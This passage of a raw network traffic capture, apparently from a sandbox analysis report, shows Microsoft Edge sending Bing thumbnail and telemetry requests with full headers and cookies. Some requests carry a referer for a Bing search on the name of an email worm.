cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df364
GET

https://th.bing.com/th?id=ODLS.78157401-198f-4ceb-88f3-08ecac8426aa&w=18&h=18&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /th?id=ODLS.78157401-198f-4ceb-88f3-08ecac8426aa&w=18&h=18&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df365
GET

https://th.bing.com/th?id=ODLS.704ab8bf-202e-4c2b-bc42-3582515e3227&w=16&h=16&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /th?id=ODLS.704ab8bf-202e-4c2b-bc42-3582515e3227&w=16&h=16&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df366
GET

https://th.bing.com/th?id=ODLS.3c42417e-238d-4980-8afa-9e3e29ee5d9e&w=16&h=16&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /th?id=ODLS.3c42417e-238d-4980-8afa-9e3e29ee5d9e&w=16&h=16&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1311
cache-control: public, max-age=2262544
date: Wed, 12 Mar 2025 02:37:03 GMT
x-cache: TCP_MISS from a95-101-143-215.deploy.akamaitechnologies.com (AkamaiGHost/22.0.0-bb2a2774a48042877147cbed2bad8ca6) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.d78f655f.1741747023.32df372
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.7e573865-4b8e-495f-9687-175a9f32a06a&w=16&h=16&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /th?id=ODLS.7e573865-4b8e-495f-9687-175a9f32a06a&w=16&h=16&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df375
GET

https://th.bing.com/th?id=ODLS.704ab8bf-202e-4c2b-bc42-3582515e3227&w=32&h=32&qlt=92&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /th?id=ODLS.704ab8bf-202e-4c2b-bc42-3582515e3227&w=32&h=32&qlt=92&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df373
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22,%22SDK%22:%22SJ%22}]

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22,%22SDK%22:%22SJ%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df374
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022431%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22601%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022433%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022439%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1741747022453%2C%22Name%22%3A553%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022458%2C%22Name%22%3A%22ButtonVisible%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022461%2C%22Name%22%3A%22VisibleOrDelayed%22%2C%22FID%22%3A%22BottomBanner%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022462%2C%22Name%22%3A%22BottomBanner%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1741747022462%2C%22Name%22%3A%22bnp.notif.shown%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1741747022462%2C%22Name%22%3A%22InitializationStarted%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1741747022462%2C%22Name%22%3A%22bnp.embed.ready%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNPUxAssetIndex%22%2C%22TS%22%3A1741747022462%2C%22Name%22%3A0%2C%22FID%22%3A%22BNP%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1741747022463%2C%22Name%22%3A1263%2C%22FID%22%3A%22ViewPortWidth%22%7D%5D

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022431%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22601%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022433%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022439%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1741747022453%2C%22Name%22%3A553%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022458%2C%22Name%22%3A%22ButtonVisible%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022461%2C%22Name%22%3A%22VisibleOrDelayed%22%2C%22FID%22%3A%22BottomBanner%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022462%2C%22Name%22%3A%22BottomBanner%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1741747022462%2C%22Name%22%3A%22bnp.notif.shown%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1741747022462%2C%22Name%22%3A%22InitializationStarted%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1741747022462%2C%22Name%22%3A%22bnp.embed.ready%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNPUxAssetIndex%22%2C%22TS%22%3A1741747022462%2C%22Name%22%3A0%2C%22FID%22%3A%22BNP%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1741747022463%2C%22Name%22%3A1263%2C%22FID%22%3A%22ViewPortWidth%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 480
cache-control: public, max-age=2591949
date: Wed, 12 Mar 2025 02:37:03 GMT
x-cache: TCP_MISS from a95-101-143-215.deploy.akamaitechnologies.com (AkamaiGHost/22.0.0-bb2a2774a48042877147cbed2bad8ca6) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.d78f655f.1741747023.32df371
x-check-cacheable: YES
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1741747022463%2C%22Name%22%3A%22OfferIdMissing%22%2C%22FID%22%3A%22BNPOfferId%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.EffectiveLocation%22%2C%22TS%22%3A1741747022464%2C%22Name%22%3A%22tryWriteEffectiveLocation%22%2C%22FID%22%3A%22EffectiveLocation%22%7D%5D

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1741747022463%2C%22Name%22%3A%22OfferIdMissing%22%2C%22FID%22%3A%22BNPOfferId%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.EffectiveLocation%22%2C%22TS%22%3A1741747022464%2C%22Name%22%3A%22tryWriteEffectiveLocation%22%2C%22FID%22%3A%22EffectiveLocation%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
